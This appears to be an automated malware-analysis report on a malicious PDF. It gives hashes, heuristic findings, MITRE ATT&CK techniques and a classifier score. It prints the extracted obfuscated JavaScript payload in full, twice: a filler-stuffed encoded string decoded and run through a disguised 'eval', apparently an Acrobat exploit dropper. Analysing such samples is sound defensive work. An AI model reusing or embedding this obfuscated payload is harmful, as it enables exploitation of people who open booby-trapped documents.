PDF malware analysis — malicious · 766970258b5ced06

MALICIOUS

PDF

7.4 KB Created: 2010-09-16 18:55:19 Authoring application: Tolhipezorojpagiwaqo (via 761a2Seueganadazaqeav)

MD5: e4411f2566aaea0691d6031b0263797d SHA-1: 2711b91a4e00b7920bf4f8e8da0d2576d76ee9d9 SHA-256: 766970258b5ced06f5b5ef4338c0600ec80dcc2a105163ec3f9feac3e33acbee

106 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript, indicated by multiple heuristic firings related to JavaScript actions and obfuscated name objects. The embedded JavaScript stream, named 'javascript_obj0011_000.js', is likely responsible for downloading and executing a secondary payload. The ML classifier strongly flags this PDF as malicious, supporting the conclusion that it is part of a malicious document delivery chain, likely via spearphishing.

Machine Learning

Nyx PDF Classifier malicious score 0.9954

Heuristics 3

Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT

A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0011_000.js
e2d41866c9fb013feb60cefe8b41892c7277decb0774febb940ce493b1221654 pdf-javascript-stream PDF /JS object 11 at offset 0x1387 2332 bytes

Filename	Kind	Source	Size
`javascript_obj0011_000.js` `e2d41866c9fb013feb60cefe8b41892c7277decb0774febb940ce493b1221654`	pdf-javascript-stream	PDF /JS object 11 at offset 0x1387	2332 bytes
Preview script First 1,000 lines of the extracted script var mROH = null; try { var zMR=new String("len"+"gth"); var jI=String("rAt"); var kNMF=String("cha"); var b=this; var tS=50; var sVGH=1; var vOR=0; var eNMP=/[8~@Z]/g; function tU(sPUB){ this.v=sPUB; }; var h="va~r8 8a@X~AZLZ=Zt~hZi~s8.Zv@;Zl@=Z\'ZgZe~t8P@a@gZeZNZ\'8;8h8U@XZ=8l~+Z\'Zt~hZWZo~r~d~\'Z;ZxZAZL~=Zl~+Z\'@uZm@W@o~r8d8s@\'Z;~h@C@H~=8\'@p@a@g8e@N8uZmZ\'Z;~r8O~PZQZ 8=Z ~9@1Z @;8v8K~N@=8\'8\'~;8m@H8K~N8=~\'8j@o@iZn~\'@;8bZY8L~W8=Z\'~\'8;~vZOZR8=Z0~;~h8C8N@=ZSZt~rZiZn8g8;@nZY~X8=~\'8s8u8bZs@tZrZ\'8;Zw8H8A@BZ=~\'8e8v8a~l~\'Z;@z@M@R@=8\'@l@e8n~g8t8hZ\'Z;@v8I@=@\'~\\@\\8x~\'8;8xZW@L@=8\'8t8oZS@t8r@iZn@g8\'~;@lZW~R@=Z\'~p~a~rZs@e8IZn8t~\'@;ZbZQZR~=~\'8f8r@o@m8C@hZa8r@C8o@dZe@\'Z;ZfZS8J@=Z\'8c~hZaZrZC@oZd~e~A@tZ\'Z;@s@V8GZHZ=@4~/Z4Z;~p~C@X8=@18+Z4~;@zZYZJ@=@2~0@0@+85~5@;8b8=~\'8d8o8c~\'8;8t8W@D@A@=@383@2@;@e8N8A@DZ=~[8]8;Zs8X@M8J~=Z\'@\'8;@t~Y~LZM@=Z1@6Z;Zt8W~R~=82@;@m8NZGZF@=Z4@;Zd8G8=Za~X8AZL8[~xZAZL~]Z(8a@X8A~LZ[Zh@C8H@]@)Z;Zf@o8rZ(@hZG~NZ=@v~O~R@;Zh~G~NZ<8 Zd8GZ;Z @h8G@N~+@+Z)8{8v8a8r8 Zq8L8O~H~=@a8X@AZL@[@h8U8X~]@(8aZX~A@L~[8h~C@HZ]~,~h@G@N@,8t8rZu~e~)8;@b@Y@L@W~=@[@bZY8L@WZ,@q8L~O8H8]8[@mZHZKZN~]~(@v~KZN8)8;~;~}~f~o~r8(~h~G@N@=Z0@;8h~G@NZ @<8 Zb~Y8L8WZ[@zZM8R~]Z;~ 8h@G8N@+Z=~tZW8RZ)@{@j8=ZbZYZLZW@[ZnZY@X~]@(8h@GZN~,~t~WZR8)~;~t~W8=8p@a~r@s8eZI8n@tZ(~j@,8t8YZLZM8)8;Zw@D@K@VZ=8tZW~^~rZO~P@Q8;8f8=Zw@D@K@VZ.~t8o~S8t~r8i~nZg~(@t8Y~L8M8)~;8f~=@(8fZ[@z~M8RZ]~=8=8s@VZG~H~)8 ~?~ Z\'80~\'@ 8+~ Zf@ @:Z @f8;@e~N8A~D@.8p@uZsZh@(8fZ)@;Z}~tZr~y~ 8{Zs~X~MZJZ=@n@e8w@ 8S@t8r@i8n8gZ(Zv@I8 ~+~ ~e8N@AZD8[@m@H@KZN@]8(8v~I@)~)8;~a~p~p~[@w~H@AZB@]~(@\'Zs~X~M@J8=Z\"8\'@+8sZX8M~J~+Z\'Z\"8;~\'~)~;@a8XZA~L8.Zl@W@T8=@(Zs@X~M@JZ[8n~Y~X8]@(Zs~X~MZJ~[@z8MZR~]@-~t~W~D8A@)8)~;~a~X8A@L@.@x@U~D~=~(8s@X~MZJ~[8nZY~X8]Z(~v8O~R~,Zs@X8M@J8[@zZM8RZ]Z-8t@W8D@AZ)8)Z;8rZO~D8(@)8;~}@ Zc~a8t~c8hZ(Zb@Q@J~)@{8iZf8(ZaZXZA~L@.~x8UZDZ)@{~t@r@y8 8{~a~p@p~[8w~HZA@BZ]~(8a8X@A@L~.8x~U8DZ)~;~}@ ~c@a~tZcZh8(ZbZQZJZ)@{Z}@}@ 8e@l@s8e@ @{8}~}8"; app.zYZ=function(xGV){ dMH=''; var jCH = kNMF + jI; for(hGN=xGV[zMR];hGN >= 0;hGN--){ dMH+=xGV[jCH](hGN); } return dMH; } var zYZ=app.zYZ; wHAB=zYZ("la"+"ve"); tOH = app.zYZ('epytotorp'); h=h.replace(eNMP, ''); tU.prototype={ lUT : function(nMX){ if(nMX > tS){ this.v[wHAB](h); } else { mROH.lUT(nMX+sVGH); } }, }; var mROH=new tU(b); mROH.lUT(vOR); } catch(sXMJ){ app.alert(sXMJ); }

Preview script

First 1,000 lines of the extracted script

var mROH = null;

try {

var zMR=new String("len"+"gth");
var jI=String("rAt");
var kNMF=String("cha");
var b=this;
var tS=50;
var sVGH=1;
var vOR=0;


var eNMP=/[8~@Z]/g;

function tU(sPUB){
this.v=sPUB;
};


var h="va~r8 8a@X~AZLZ=Zt~hZi~s8.Zv@;Zl@=Z\'ZgZe~t8P@a@gZeZNZ\'8;8h8U@XZ=8l~+Z\'Zt~hZWZo~r~d~\'Z;ZxZAZL~=Zl~+Z\'@uZm@W@o~r8d8s@\'Z;~h@C@H~=8\'@p@a@g8e@N8uZmZ\'Z;~r8O~PZQZ 8=Z ~9@1Z @;8v8K~N@=8\'8\'~;8m@H8K~N8=~\'8j@o@iZn~\'@;8bZY8L~W8=Z\'~\'8;~vZOZR8=Z0~;~h8C8N@=ZSZt~rZiZn8g8;@nZY~X8=~\'8s8u8bZs@tZrZ\'8;Zw8H8A@BZ=~\'8e8v8a~l~\'Z;@z@M@R@=8\'@l@e8n~g8t8hZ\'Z;@v8I@=@\'~\\@\\8x~\'8;8xZW@L@=8\'8t8oZS@t8r@iZn@g8\'~;@lZW~R@=Z\'~p~a~rZs@e8IZn8t~\'@;ZbZQZR~=~\'8f8r@o@m8C@hZa8r@C8o@dZe@\'Z;ZfZS8J@=Z\'8c~hZaZrZC@oZd~e~A@tZ\'Z;@s@V8GZHZ=@4~/Z4Z;~p~C@X8=@18+Z4~;@zZYZJ@=@2~0@0@+85~5@;8b8=~\'8d8o8c~\'8;8t8W@D@A@=@383@2@;@e8N8A@DZ=~[8]8;Zs8X@M8J~=Z\'@\'8;@t~Y~LZM@=Z1@6Z;Zt8W~R~=82@;@m8NZGZF@=Z4@;Zd8G8=Za~X8AZL8[~xZAZL~]Z(8a@X8A~LZ[Zh@C8H@]@)Z;Zf@o8rZ(@hZG~NZ=@v~O~R@;Zh~G~NZ<8 Zd8GZ;Z @h8G@N~+@+Z)8{8v8a8r8 Zq8L8O~H~=@a8X@AZL@[@h8U8X~]@(8aZX~A@L~[8h~C@HZ]~,~h@G@N@,8t8rZu~e~)8;@b@Y@L@W~=@[@bZY8L@WZ,@q8L~O8H8]8[@mZHZKZN~]~(@v~KZN8)8;~;~}~f~o~r8(~h~G@N@=Z0@;8h~G@NZ @<8 Zb~Y8L8WZ[@zZM8R~]Z;~ 8h@G8N@+Z=~tZW8RZ)@{@j8=ZbZYZLZW@[ZnZY@X~]@(8h@GZN~,~t~WZR8)~;~t~W8=8p@a~r@s8eZI8n@tZ(~j@,8t8YZLZM8)8;Zw@D@K@VZ=8tZW~^~rZO~P@Q8;8f8=Zw@D@K@VZ.~t8o~S8t~r8i~nZg~(@t8Y~L8M8)~;8f~=@(8fZ[@z~M8RZ]~=8=8s@VZG~H~)8 ~?~ Z\'80~\'@ 8+~ Zf@ @:Z @f8;@e~N8A~D@.8p@uZsZh@(8fZ)@;Z}~tZr~y~ 8{Zs~X~MZJZ=@n@e8w@ 8S@t8r@i8n8gZ(Zv@I8 ~+~ ~e8N@AZD8[@m@H@KZN@]8(8v~I@)~)8;~a~p~p~[@w~H@AZB@]~(@\'Zs~X~M@J8=Z\"8\'@+8sZX8M~J~+Z\'Z\"8;~\'~)~;@a8XZA~L8.Zl@W@T8=@(Zs@X~M@JZ[8n~Y~X8]@(Zs~X~MZJ~[@z8MZR~]@-~t~W~D8A@)8)~;~a~X8A@L@.@x@U~D~=~(8s@X~MZJ~[8nZY~X8]Z(~v8O~R~,Zs@X8M@J8[@zZM8RZ]Z-8t@W8D@AZ)8)Z;8rZO~D8(@)8;~}@ Zc~a8t~c8hZ(Zb@Q@J~)@{8iZf8(ZaZXZA~L@.~x8UZDZ)@{~t@r@y8 8{~a~p@p~[8w~HZA@BZ]~(8a8X@A@L~.8x~U8DZ)~;~}@ ~c@a~tZcZh8(ZbZQZJZ)@{Z}@}@ 8e@l@s8e@ @{8}~}8";


app.zYZ=function(xGV){

dMH='';
var jCH = kNMF + jI;
for(hGN=xGV[zMR];hGN >= 0;hGN--){
 dMH+=xGV[jCH](hGN);
}

return dMH;
}

var zYZ=app.zYZ;

wHAB=zYZ("la"+"ve");
tOH = app.zYZ('epytotorp');

h=h.replace(eNMP, '');


tU.prototype={

lUT : function(nMX){
if(nMX > tS){
this.v[wHAB](h);
} else {
mROH.lUT(nMX+sVGH);
}
},
};

var mROH=new tU(b);

mROH.lUT(vOR);

} catch(sXMJ){
app.alert(sXMJ);
}

Open this report in the interactive analyzer, or submit your own file for analysis.